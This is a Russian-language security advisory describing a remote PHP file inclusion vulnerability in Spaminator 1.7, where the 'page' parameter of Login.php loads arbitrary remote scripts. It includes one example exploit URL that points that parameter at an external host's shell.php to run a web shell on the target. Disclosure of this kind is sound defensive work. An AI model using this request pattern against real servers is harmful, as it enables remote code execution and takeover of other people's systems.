PHP-инклюдинг в Spaminator

Дата публикации:
18.08.2006
Всего просмотров:
988
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Spaminator 1.x
Уязвимые версии: Spaminator 1.7, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "page" в сценарии Login.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://victim/dir_spaminator/src/Login.php?page=http://www.evalsite.com/shell.php?

URL производителя: spaminator.wesmo.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Spaminator <= 1.7 (page) Remote File Include Vulnerability

или введите имя

CAPTCHA